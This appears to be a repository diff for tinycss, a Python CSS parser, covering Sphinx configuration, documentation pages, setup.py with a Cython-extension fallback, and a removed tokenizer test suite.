# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'agogo'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'tinycssdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'tinycss.tex', 'tinycss Documentation',
'Simon Sapin', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'tinycss', 'tinycss Documentation',
['Simon Sapin'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'tinycss', 'tinycss Documentation',
'Simon Sapin', 'tinycss', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}

View File

@ -0,0 +1,116 @@
CSS 3 Modules
=============
.. _selectors3:
Selectors 3
-----------
.. currentmodule:: tinycss.css21
On :attr:`RuleSet.selector`, the :meth:`~.token_data.TokenList.as_css` method
can be used to serialize a selector back to a Unicode string.
>>> import tinycss
>>> stylesheet = tinycss.make_parser().parse_stylesheet(
... 'div.error, #root > section:first-letter { color: red }')
>>> selector_string = stylesheet.rules[0].selector.as_css()
>>> selector_string
'div.error, #root > section:first-letter'
This string can be parsed by cssselect_. The parsed objects have information
about pseudo-elements and selector specificity.
.. _cssselect: http://packages.python.org/cssselect/
>>> import cssselect
>>> selectors = cssselect.parse(selector_string)
>>> [s.specificity() for s in selectors]
[(0, 1, 1), (1, 0, 2)]
>>> [s.pseudo_element for s in selectors]
[None, 'first-letter']
These objects can in turn be translated to XPath expressions. Note that
the translation ignores pseudo-elements, you have to account for them
somehow or reject selectors with pseudo-elements.
>>> xpath = cssselect.HTMLTranslator().selector_to_xpath(selectors[1])
>>> xpath
"descendant-or-self::*[@id = 'root']/section"
Finally, the XPath expressions can be used with lxml_ to find the matching
elements.
>>> from lxml import etree
>>> compiled_selector = etree.XPath(xpath)
>>> document = etree.fromstring('''<section id="root">
... <section id="head">Title</section>
... <section id="content">
... Lorem <section id="sub-section">ipsum</section>
... </section>
... </section>''')
>>> [el.get('id') for el in compiled_selector(document)]
['head', 'content']
.. _lxml: http://lxml.de/xpathxslt.html#xpath
Find more details in the `cssselect documentation`_.
.. _cssselect documentation: http://packages.python.org/cssselect/
.. module:: tinycss.color3
Color 3
-------
This module implements parsing for the *<color>* values, as defined in
`CSS 3 Color <http://www.w3.org/TR/css3-color/>`_.
The (deprecated) CSS2 system colors are not supported, but you can
easily test for them if you want as they are simple ``IDENT`` tokens.
For example::
if token.type == 'IDENT' and token.value == 'ButtonText':
return ...
All other values types *are* supported:
* Basic, extended (X11) and transparent color keywords;
* 3-digit and 6-digit hexadecimal notations;
* ``rgb()``, ``rgba()``, ``hsl()`` and ``hsla()`` functional notations.
* ``currentColor``
This module does not integrate with a parser class. Instead, it provides
a function that can parse tokens as found in :attr:`.css21.Declaration.value`,
for example.
.. autofunction:: parse_color
.. autofunction:: parse_color_string
.. autoclass:: RGBA
.. module:: tinycss.page3
Paged Media 3
-------------
.. autoclass:: CSSPage3Parser
.. autoclass:: MarginRule
.. module:: tinycss.fonts3
Fonts 3
-------
.. autoclass:: CSSFonts3Parser
.. autoclass:: FontFaceRule
.. autoclass:: FontFeatureValuesRule
.. autoclass:: FontFeatureRule
Other CSS modules
-----------------
To add support for new CSS syntax, see :ref:`extending`.

View File

@ -0,0 +1,97 @@
.. _extending:
Extending the parser
====================
Modules such as :mod:`.page3` extend the CSS 2.1 parser to add support for
CSS 3 syntax.
They do so by sub-classing :class:`.css21.CSS21Parser` and overriding/extending
some of its methods. In fact, the parser is made of methods in a class
(rather than a set of functions) solely to enable this kind of sub-classing.
tinycss is designed to enable you to have parser subclasses outside of
tinycss, without monkey-patching. If however the syntax you added is for a
W3C specification, consider including your subclass in a new tinycss module
and send a pull request: see :ref:`hacking`.
.. currentmodule:: tinycss.css21
Example: star hack
------------------
.. _star hack: https://en.wikipedia.org/wiki/CSS_filter#Star_hack
The `star hack`_ uses invalid declarations that are only parsed by some
versions of Internet Explorer. By default, tinycss ignores invalid
declarations and logs an error.
>>> from tinycss.css21 import CSS21Parser
>>> css = '#elem { width: [W3C Model Width]; *width: [BorderBox Model]; }'
>>> stylesheet = CSS21Parser().parse_stylesheet(css)
>>> stylesheet.errors
[ParseError('Parse error at 1:35, expected a property name, got DELIM',)]
>>> [decl.name for decl in stylesheet.rules[0].declarations]
['width']
If for example a minifier based on tinycss wants to support the star hack,
it can by extending the parser::
>>> class CSSStarHackParser(CSS21Parser):
... def parse_declaration(self, tokens):
... has_star_hack = (tokens[0].type == 'DELIM' and tokens[0].value == '*')
... if has_star_hack:
... tokens = tokens[1:]
... declaration = super(CSSStarHackParser, self).parse_declaration(tokens)
... declaration.has_star_hack = has_star_hack
... return declaration
...
>>> stylesheet = CSSStarHackParser().parse_stylesheet(css)
>>> stylesheet.errors
[]
>>> [(d.name, d.has_star_hack) for d in stylesheet.rules[0].declarations]
[('width', False), ('width', True)]
This class extends the :meth:`~CSS21Parser.parse_declaration` method.
It removes any ``*`` delimiter :class:`~.token_data.Token` at the start of
a declaration, and adds a ``has_star_hack`` boolean attribute on parsed
:class:`Declaration` objects: ``True`` if a ``*`` was removed, ``False`` for
“normal” declarations.
Parser methods
--------------
In addition to methods of the user API (see :ref:`parsing`), here
are the methods of the CSS 2.1 parser that can be overridden or extended:
.. automethod:: CSS21Parser.parse_rules
.. automethod:: CSS21Parser.read_at_rule
.. automethod:: CSS21Parser.parse_at_rule
.. automethod:: CSS21Parser.parse_media
.. automethod:: CSS21Parser.parse_page_selector
.. automethod:: CSS21Parser.parse_declarations_and_at_rules
.. automethod:: CSS21Parser.parse_ruleset
.. automethod:: CSS21Parser.parse_declaration_list
.. automethod:: CSS21Parser.parse_declaration
.. automethod:: CSS21Parser.parse_value_priority
Unparsed at-rules
-----------------
.. autoclass:: AtRule
.. module:: tinycss.parsing
Parsing helper functions
------------------------
The :mod:`tinycss.parsing` module contains helper functions for parsing
tokens into a more structured form:
.. autofunction:: strip_whitespace
.. autofunction:: split_on_comma
.. autofunction:: validate_value
.. autofunction:: validate_block
.. autofunction:: validate_any

View File

@ -0,0 +1,117 @@
.. _hacking:
Hacking tinycss
===============
.. highlight:: sh
Bugs and feature requests
-------------------------
Bug reports, feature requests and other issues should got to the
`tinycss issue tracker`_ on Github. Any suggestion or feedback is welcome.
Please include in full any error message, trackback or other detail that
could be helpful.
.. _tinycss issue tracker: https://github.com/SimonSapin/tinycss/issues
Installing the development version
----------------------------------
First, get the latest git version::
git clone https://github.com/SimonSapin/tinycss.git
cd tinycss
You will need Cython_ and pytest_. Installing in a virtualenv_ is recommended::
virtualenv env
. env/bin/activate
pip install Cython pytest
.. _Cython: http://cython.org/
.. _pytest: http://pytest.org/
.. _virtualenv: http://www.virtualenv.org/
Then, install tinycss in-place with pip's *editable mode*. This will also
build the accelerators::
pip install -e .
Running the test suite
----------------------
Once you have everything installed (see above), just run pytest from the
*tinycss* directory::
py.test
If the accelerators are not available for some reason, use the
``TINYCSS_SKIP_SPEEDUPS_TESTS`` environment variable::
TINYCSS_SKIP_SPEEDUPS_TESTS=1 py.test
If you get test failures on a fresh git clone, something may have gone wrong
during the installation. Otherwise, you probably found a bug. Please
`report it <#bugs-and-feature-requests>`_.
Test in multiple Python versions with tox
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
tox_ automatically creates virtualenvs for various Python versions and
runs the test suite there::
pip install tox
Change to the project's root directory and just run::
tox
.. _tox: http://tox.testrun.org/
tinycss comes with a pre-configured ``tox.ini`` file to test in CPython
2.6, 2.7, 3.1 and 3.2 as well as PyPy. You can change that with the ``-e``
parameter::
tox -e py27,py32
If you use ``--`` in the arguments passed to tox, further arguments
are passed to the underlying ``py.test`` command::
tox -- -x --pdb
Building the documentation
--------------------------
This documentation is made with Sphinx_::
pip install Sphinx
.. _Sphinx: http://sphinx.pocoo.org/
To build the HTML version of the documentation, change to the project's root
directory and run::
python setup.py build_sphinx
The built HTML files are in ``docs/_build/html``.
Making a patch and a pull request
---------------------------------
If you would like to see something included in tinycss, please fork
`the repository <https://github.com/SimonSapin/tinycss/>`_ on Github
and make a pull request. Make sure to include tests for your change.
Mailing-list
------------
tinycss does not have a mailing-list of its own for now, but the
`WeasyPrint mailing-list <http://weasyprint.org/community/>`_
is appropriate to discuss it.

View File

@ -0,0 +1,50 @@
.. include:: ../README.rst
Requirements
------------
`tinycss is tested <https://travis-ci.org/Kozea/tinycss>`_ on CPython 2.7, 3.3,
3.4 and 3.5 as well as PyPy 5.3 and PyPy3 2.4; it should work on any
implementation of **Python 2.7 or later version (including 3.x)** of the
language.
Cython_ is used for optional accelerators but is only required for
development versions of tinycss.
.. _Cython: http://cython.org/
Installation
------------
Installing with `pip <http://www.pip-installer.org/>`_ should Just Work:
.. code-block:: sh
pip install tinycss
The release tarballs contain pre-*cythoned* C files for the accelerators:
you will not need Cython to install like this.
If the accelerators fail to build for some reason, tinycss will
print a warning and fall back to a pure-Python installation.
Documentation
-------------
.. Have this page in the sidebar, but do not show a link to itself here:
.. toctree::
:hidden:
self
.. toctree::
:maxdepth: 2
parsing
css3
extending
hacking
changelog

View File

@ -0,0 +1,97 @@
Parsing with tinycss
====================
.. highlight:: python
Quickstart
----------
Import *tinycss*, make a parser object with the features you want,
and parse a stylesheet:
.. doctest::
>>> import tinycss
>>> parser = tinycss.make_parser('page3')
>>> stylesheet = parser.parse_stylesheet_bytes(b'''@import "foo.css";
... p.error { color: red } @lorem-ipsum;
... @page tables { size: landscape }''')
>>> stylesheet.rules
[<ImportRule 1:1 foo.css>, <RuleSet at 2:5 p.error>, <PageRule 3:5 ('tables', None)>]
>>> stylesheet.errors
[ParseError('Parse error at 2:29, unknown at-rule in stylesheet context: @lorem-ipsum',)]
You'll get a :class:`~tinycss.css21.Stylesheet` object which contains
all the parsed content as well as a list of encountered errors.
Parsers
-------
Parsers are subclasses of :class:`tinycss.css21.CSS21Parser`. Various
subclasses add support for more syntax. You can choose which features to
enable by making a new parser class with multiple inheritance, but there
is also a convenience function to do that:
.. module:: tinycss
.. autofunction:: make_parser
.. module:: tinycss.css21
.. _parsing:
Parsing a stylesheet
~~~~~~~~~~~~~~~~~~~~
Parser classes have three different methods to parse CSS stylesheet,
depending on whether you have a file, a byte string, or a Unicode string.
.. autoclass:: CSS21Parser
:members: parse_stylesheet_file, parse_stylesheet_bytes, parse_stylesheet
Parsing a ``style`` attribute
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. automethod:: CSS21Parser.parse_style_attr
Parsed objects
--------------
These data structures make up the results of the various parsing methods.
.. autoclass:: tinycss.parsing.ParseError()
.. autoclass:: Stylesheet()
.. note::
All subsequent objects have :obj:`line` and :obj:`column` attributes (not
repeated every time for brevity) that indicate where in the CSS source
this object was read.
.. autoclass:: RuleSet()
.. autoclass:: ImportRule()
.. autoclass:: MediaRule()
.. autoclass:: PageRule()
.. autoclass:: Declaration()
Tokens
------
Some parts of a stylesheet (such as selectors in CSS 2.1 or property values)
are not parsed by tinycss. They appear as tokens instead.
.. module:: tinycss.token_data
.. autoclass:: TokenList()
:member-order: bysource
:members:
.. autoclass:: Token()
:members:
.. autoclass:: tinycss.speedups.CToken()
.. autoclass:: ContainerToken()
:members:
.. autoclass:: FunctionToken()

View File

@ -0,0 +1,23 @@
[build_sphinx]
source-dir = docs
build-dir = docs/_build
[upload_sphinx]
upload-dir = docs/_build/html
[aliases]
test = pytest
[tool:pytest]
addopts = --flake8 --isort --cov --ignore=test/cairosvg_reference
norecursedirs = dist .cache .git build *.egg-info .eggs venv cairosvg_reference
flake8-ignore = docs/conf.py ALL
isort_ignore =
docs/conf.py
setup.py
[egg_info]
tag_build =
tag_date = 0
tag_svn_revision = 0

View File

@ -0,0 +1,127 @@
import os.path
import re
import sys
from distutils.errors import (
CCompilerError, DistutilsExecError, DistutilsPlatformError)
from setuptools import Extension, setup
try:
from Cython.Distutils import build_ext
import Cython.Compiler.Version
CYTHON_INSTALLED = True
except ImportError:
from distutils.command.build_ext import build_ext
CYTHON_INSTALLED = False
ext_errors = (CCompilerError, DistutilsExecError, DistutilsPlatformError)
if sys.platform == 'win32' and sys.version_info > (2, 6):
# 2.6's distutils.msvc9compiler can raise an IOError when failing to
# find the compiler
ext_errors += (IOError,)
class BuildFailed(Exception):
    """Raised when compiling the optional C extension fails for any reason."""
    pass
class ve_build_ext(build_ext):
    # This class allows C extension building to fail.
    # Both hooks convert compiler/toolchain errors into BuildFailed so the
    # top-level script can catch it and retry a pure-Python installation.

    def run(self):
        try:
            build_ext.run(self)
        except DistutilsPlatformError:
            # No usable compiler/platform support at all.
            raise BuildFailed

    def build_extension(self, ext):
        try:
            build_ext.build_extension(self, ext)
        except ext_errors:
            # Compilation of this particular extension failed.
            raise BuildFailed
ROOT = os.path.dirname(__file__)
with open(os.path.join(ROOT, 'tinycss', 'version.py')) as fd:
VERSION = re.search("VERSION = '([^']+)'", fd.read()).group(1)
with open(os.path.join(ROOT, 'README.rst'), 'rb') as fd:
README = fd.read().decode('utf8')
needs_pytest = {'pytest', 'test', 'ptr'}.intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
def run_setup(with_extension):
    """Call ``setuptools.setup()`` for tinycss.

    :param with_extension:
        If true, build the ``tinycss.speedups`` accelerator module:
        from its Cython source when Cython is installed, otherwise from
        the pre-generated C file shipped in release tarballs.
    """
    if with_extension:
        extension_path = os.path.join('tinycss', 'speedups')
        if CYTHON_INSTALLED:
            extension_path += '.pyx'
            print('Building with Cython %s.' % Cython.Compiler.Version.version)
        else:
            extension_path += '.c'
            if not os.path.exists(extension_path):
                # The compile step will fail later; warn now so the cause
                # is obvious in the build log.
                print("WARNING: Trying to build without Cython, but "
                      "pre-generated '%s' does not seem to be available."
                      % extension_path)
            else:
                print('Building without Cython.')
        # ve_build_ext turns compiler errors into BuildFailed (see above).
        kwargs = dict(
            cmdclass=dict(build_ext=ve_build_ext),
            ext_modules=[Extension('tinycss.speedups',
                                   sources=[extension_path])],
        )
    else:
        kwargs = dict()
    setup(
        name='tinycss',
        version=VERSION,
        url='http://tinycss.readthedocs.io/',
        license='BSD',
        author='Simon Sapin',
        author_email='simon.sapin@exyr.org',
        description='tinycss is a complete yet simple CSS parser for Python.',
        long_description=README,
        classifiers=[
            'Development Status :: 4 - Beta',
            'Intended Audience :: Developers',
            'License :: OSI Approved :: BSD License',
            'Programming Language :: Python :: 2',
            'Programming Language :: Python :: 2.7',
            'Programming Language :: Python :: 3',
            'Programming Language :: Python :: 3.3',
            'Programming Language :: Python :: 3.4',
            'Programming Language :: Python :: 3.5',
            'Programming Language :: Python :: Implementation :: CPython',
            'Programming Language :: Python :: Implementation :: PyPy',
        ],
        setup_requires=pytest_runner,
        tests_require=[
            'pytest-cov', 'pytest-flake8', 'pytest-isort', 'pytest-runner'],
        extras_require={'test': (
            'pytest-runner', 'pytest-cov', 'pytest-flake8', 'pytest-isort')},
        packages=['tinycss', 'tinycss.tests'],
        **kwargs
    )
# C extensions are slow (or unsupported) on PyPy; skip them there.
IS_PYPY = hasattr(sys, 'pypy_translation_info')
try:
    run_setup(not IS_PYPY)
except BuildFailed:
    # The extension failed to compile: fall back to pure Python so the
    # installation still succeeds, just without the accelerators.
    BUILD_EXT_WARNING = ('WARNING: The extension could not be compiled, '
                         'speedups are not enabled.')
    print('*' * 75)
    print(BUILD_EXT_WARNING)
    print('Failure information, if any, is above.')
    print('Retrying the build without the Cython extension now.')
    print('*' * 75)
    run_setup(False)
    print('*' * 75)
    print(BUILD_EXT_WARNING)
    print('Plain-Python installation succeeded.')
    print('*' * 75)

File diff suppressed because it is too large Load Diff

View File

@ -1,310 +0,0 @@
# coding: utf8
"""
Tests for the tokenizer
-----------------------
:copyright: (c) 2012 by Simon Sapin.
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals
import sys
import os
import pytest
from tinycss.tokenizer import (
python_tokenize_flat, cython_tokenize_flat, regroup)
def test_speedups():
    """Fail loudly if the Cython accelerators are unexpectedly missing."""
    # Opt-out knob for platforms where the accelerators are expected to be
    # absent (e.g. PyPy): set TINYCSS_SKIP_SPEEDUPS_TESTS in the environment.
    if os.environ.get('TINYCSS_SKIP_SPEEDUPS_TESTS'):  # pragma: no cover
        return
    assert cython_tokenize_flat is not None, (
        'Cython speedups are not installed, related tests will '
        'be skipped. Set the TINYCSS_SKIP_SPEEDUPS_TESTS environment '
        'variable if this is expected (eg. on PyPy).')
@pytest.mark.parametrize(('tokenize', 'css_source', 'expected_tokens'), [
(tokenize,) + test_data
for tokenize in (python_tokenize_flat, cython_tokenize_flat)
for test_data in [
('', []),
('red -->',
[('IDENT', 'red'), ('S', ' '), ('CDC', '-->')]),
# Longest match rule: no CDC
('red-->',
[('IDENT', 'red--'), ('DELIM', '>')]),
(r'''p[example="\
foo(int x) {\
this.x = x;\
}\
"]''', [
('IDENT', 'p'),
('[', '['),
('IDENT', 'example'),
('DELIM', '='),
('STRING', 'foo(int x) { this.x = x;}'),
(']', ']')]),
#### Numbers are parsed
('42 .5 -4pX 1.25em 30%',
[('INTEGER', 42), ('S', ' '),
('NUMBER', .5), ('S', ' '),
# units are normalized to lower-case:
('DIMENSION', -4, 'px'), ('S', ' '),
('DIMENSION', 1.25, 'em'), ('S', ' '),
('PERCENTAGE', 30, '%')]),
#### URLs are extracted
('url(foo.png)', [('URI', 'foo.png')]),
('url("foo.png")', [('URI', 'foo.png')]),
#### Escaping
(r'/* Comment with a \ backslash */',
[('COMMENT', '/* Comment with a \ backslash */')]), # Unchanged
# backslash followed by a newline in a string: ignored
('"Lorem\\\nIpsum"', [('STRING', 'LoremIpsum')]),
# backslash followed by a newline outside a string: stands for itself
('Lorem\\\nIpsum', [
('IDENT', 'Lorem'), ('DELIM', '\\'),
('S', '\n'), ('IDENT', 'Ipsum')]),
# Cancel the meaning of special characters
(r'"Lore\m Ipsum"', [('STRING', 'Lorem Ipsum')]),  # or not special
(r'"Lorem \49psum"', [('STRING', 'Lorem Ipsum')]),
(r'"Lorem \49 psum"', [('STRING', 'Lorem Ipsum')]),
(r'"Lorem\"Ipsum"', [('STRING', 'Lorem"Ipsum')]),
(r'"Lorem\\Ipsum"', [('STRING', r'Lorem\Ipsum')]),
(r'"Lorem\5c Ipsum"', [('STRING', r'Lorem\Ipsum')]),
(r'Lorem\+Ipsum', [('IDENT', 'Lorem+Ipsum')]),
(r'Lorem+Ipsum', [('IDENT', 'Lorem'), ('DELIM', '+'), ('IDENT', 'Ipsum')]),
(r'url(foo\).png)', [('URI', 'foo).png')]),
# Unicode and backslash escaping
('\\26 B', [('IDENT', '&B')]),
('\\&B', [('IDENT', '&B')]),
('@\\26\tB', [('ATKEYWORD', '@&B')]),
('@\\&B', [('ATKEYWORD', '@&B')]),
('#\\26\nB', [('HASH', '#&B')]),
('#\\&B', [('HASH', '#&B')]),
('\\26\r\nB(', [('FUNCTION', '&B(')]),
('\\&B(', [('FUNCTION', '&B(')]),
(r'12.5\000026B', [('DIMENSION', 12.5, '&b')]),
(r'12.5\0000263B', [('DIMENSION', 12.5, '&3b')]), # max 6 digits
(r'12.5\&B', [('DIMENSION', 12.5, '&b')]),
(r'"\26 B"', [('STRING', '&B')]),
(r"'\000026B'", [('STRING', '&B')]),
(r'"\&B"', [('STRING', '&B')]),
(r'url("\26 B")', [('URI', '&B')]),
(r'url(\26 B)', [('URI', '&B')]),
(r'url("\&B")', [('URI', '&B')]),
(r'url(\&B)', [('URI', '&B')]),
(r'Lorem\110000Ipsum', [('IDENT', 'Lorem\uFFFDIpsum')]),
#### Bad strings
# String ends at EOF without closing: no error, parsed
('"Lorem\\26Ipsum', [('STRING', 'Lorem&Ipsum')]),
# Unescaped newline: ends the string, error, unparsed
('"Lorem\\26Ipsum\n', [
('BAD_STRING', r'"Lorem\26Ipsum'), ('S', '\n')]),
# Tokenization restarts after the newline, so the second " starts
# a new string (which ends at EOF without errors, as above.)
('"Lorem\\26Ipsum\ndolor" sit', [
('BAD_STRING', r'"Lorem\26Ipsum'), ('S', '\n'),
('IDENT', 'dolor'), ('STRING', ' sit')]),
]])
def test_tokens(tokenize, css_source, expected_tokens):
    """Check flat tokenization of ``css_source`` against expected tokens.

    Parametrized over both the pure-Python and the Cython tokenizers.
    """
    if tokenize is None:  # pragma: no cover
        pytest.skip('Speedups not available')
    sources = [css_source]
    if sys.version_info[0] < 3:
        # On Python 2.x, ASCII-only bytestrings can be used
        # where Unicode is expected.
        sources.append(css_source.encode('ascii'))
    for css_source in sources:
        tokens = tokenize(css_source, ignore_comments=False)
        # Compare (type, value) pairs; dimension/percentage tokens also
        # carry a unit, appended as a third element when present.
        result = [
            (token.type, token.value) + (
                () if token.unit is None else (token.unit,))
            for token in tokens
        ]
        assert result == expected_tokens
@pytest.mark.parametrize('tokenize', [
python_tokenize_flat, cython_tokenize_flat])
def test_positions(tokenize):
    """Test the reported line/column position of each token."""
    if tokenize is None:  # pragma: no cover
        pytest.skip('Speedups not available')
    # Source mixes newlines, a form feed (\f) and a tab to exercise the
    # tokenizer's position tracking across different whitespace.
    css = '/* Lorem\nipsum */\fa {\n    color: red;\tcontent: "dolor\\\fsit" }'
    tokens = tokenize(css, ignore_comments=False)
    result = [(token.type, token.line, token.column) for token in tokens]
    assert result == [
        ('COMMENT', 1, 1), ('S', 2, 9),
        ('IDENT', 3, 1), ('S', 3, 2), ('{', 3, 3),
        ('S', 3, 4), ('IDENT', 4, 5), (':', 4, 10),
        ('S', 4, 11), ('IDENT', 4, 12), (';', 4, 15), ('S', 4, 16),
        ('IDENT', 4, 17), (':', 4, 24), ('S', 4, 25), ('STRING', 4, 26),
        ('S', 5, 5), ('}', 5, 6)]
@pytest.mark.parametrize(('tokenize', 'css_source', 'expected_tokens'), [
(tokenize,) + test_data
for tokenize in (python_tokenize_flat, cython_tokenize_flat)
for test_data in [
('', []),
(r'Lorem\26 "i\psum"4px', [
('IDENT', 'Lorem&'), ('STRING', 'ipsum'), ('DIMENSION', 4)]),
('not([[lorem]]{ipsum (42)})', [
('FUNCTION', 'not', [
('[', [
('[', [
('IDENT', 'lorem'),
]),
]),
('{', [
('IDENT', 'ipsum'),
('S', ' '),
('(', [
('INTEGER', 42),
])
])
])]),
# Close everything at EOF, no error
('a[b{"d', [
('IDENT', 'a'),
('[', [
('IDENT', 'b'),
('{', [
('STRING', 'd'),
]),
]),
]),
# Any remaining ), ] or } token is a nesting error
('a[b{d]e}', [
('IDENT', 'a'),
('[', [
('IDENT', 'b'),
('{', [
('IDENT', 'd'),
(']', ']'), # The error is visible here
('IDENT', 'e'),
]),
]),
]),
# ref:
('a[b{d}e]', [
('IDENT', 'a'),
('[', [
('IDENT', 'b'),
('{', [
('IDENT', 'd'),
]),
('IDENT', 'e'),
]),
]),
]])
def test_token_grouping(tokenize, css_source, expected_tokens):
    """Check that regroup() nests container tokens as expected."""
    if tokenize is None:  # pragma: no cover
        pytest.skip('Speedups not available')
    tokens = regroup(tokenize(css_source, ignore_comments=False))
    # jsonify() flattens the token tree into comparable tuples/lists.
    result = list(jsonify(tokens))
    assert result == expected_tokens
def jsonify(tokens):
    """Flatten tokens into "JSON-compatible" nested tuples.

    FUNCTION tokens become ``(type, function_name, children)``, other
    container tokens become ``(type, children)``, and flat tokens become
    ``(type, value)``; children are converted recursively into lists.
    """
    for tok in tokens:
        kind = tok.type
        if kind == 'FUNCTION':
            yield kind, tok.function_name, list(jsonify(tok.content))
        elif tok.is_container:
            yield kind, list(jsonify(tok.content))
        else:
            yield kind, tok.value
@pytest.mark.parametrize(('tokenize', 'ignore_comments', 'expected_tokens'), [
(tokenize,) + test_data
for tokenize in (python_tokenize_flat, cython_tokenize_flat)
for test_data in [
(False, [
('COMMENT', '/* lorem */'),
('S', ' '),
('IDENT', 'ipsum'),
('[', [
('IDENT', 'dolor'),
('COMMENT', '/* sit */'),
]),
('BAD_COMMENT', '/* amet')
]),
(True, [
('S', ' '),
('IDENT', 'ipsum'),
('[', [
('IDENT', 'dolor'),
]),
]),
]])
def test_comments(tokenize, ignore_comments, expected_tokens):
    """Check that COMMENT/BAD_COMMENT tokens appear iff not ignored."""
    if tokenize is None:  # pragma: no cover
        pytest.skip('Speedups not available')
    # '/* amet' is deliberately unterminated -> BAD_COMMENT when kept.
    css_source = '/* lorem */ ipsum[dolor/* sit */]/* amet'
    tokens = regroup(tokenize(css_source, ignore_comments))
    result = list(jsonify(tokens))
    assert result == expected_tokens
@pytest.mark.parametrize(('tokenize', 'css_source'), [
(tokenize, test_data)
for tokenize in (python_tokenize_flat, cython_tokenize_flat)
for test_data in [
r'''p[example="\
foo(int x) {\
this.x = x;\
}\
"]''',
'"Lorem\\26Ipsum\ndolor" sit',
'/* Lorem\nipsum */\fa {\n color: red;\tcontent: "dolor\\\fsit" }',
'not([[lorem]]{ipsum (42)})',
'a[b{d]e}',
'a[b{"d',
]])
def test_token_serialize_css(tokenize, css_source):
    """Round-trip: serializing tokens with as_css() rebuilds the source."""
    if tokenize is None:  # pragma: no cover
        pytest.skip('Speedups not available')
    # Check both the grouped and the flat token streams.
    for _regroup in [regroup, lambda x: x]:
        tokens = _regroup(tokenize(css_source, ignore_comments=False))
        result = ''.join(token.as_css() for token in tokens)
        assert result == css_source
@pytest.mark.parametrize(('tokenize', 'css_source'), [
(tokenize, test_data)
for tokenize in (python_tokenize_flat, cython_tokenize_flat)
for test_data in [
'(8, foo, [z])', '[8, foo, (z)]', '{8, foo, [z]}', 'func(8, foo, [z])'
]
])
def test_token_api(tokenize, css_source):
    """Check the .content of a single grouped container token."""
    if tokenize is None:  # pragma: no cover
        pytest.skip('Speedups not available')
    tokens = list(regroup(tokenize(css_source)))
    # Each parametrized source is one container/function token.
    assert len(tokens) == 1
    token = tokens[0]
    expected_len = 7  # 2 spaces, 2 commas, 3 others.
    assert len(token.content) == expected_len

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss
-------
@ -9,17 +9,18 @@
:license: BSD, see LICENSE for more details.
"""
import sys
from .version import VERSION
__version__ = VERSION
from .css21 import CSS21Parser
from .page3 import CSSPage3Parser
from .fonts3 import CSSFonts3Parser
__version__ = VERSION
PARSER_MODULES = {
'page3': CSSPage3Parser,
'fonts3': CSSFonts3Parser,
}
@ -30,6 +31,8 @@ def make_parser(*features, **kwargs):
Positional arguments are base classes the new parser class will extend.
The string ``'page3'`` is accepted as short for
:class:`~page3.CSSPage3Parser`.
The string ``'fonts3'`` is accepted as short for
:class:`~fonts3.CSSFonts3Parser`.
:param kwargs:
Keyword arguments are passed to the parser's constructor.
:returns:

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.colors3
---------------
@ -13,7 +13,8 @@
:license: BSD, see LICENSE for more details.
"""
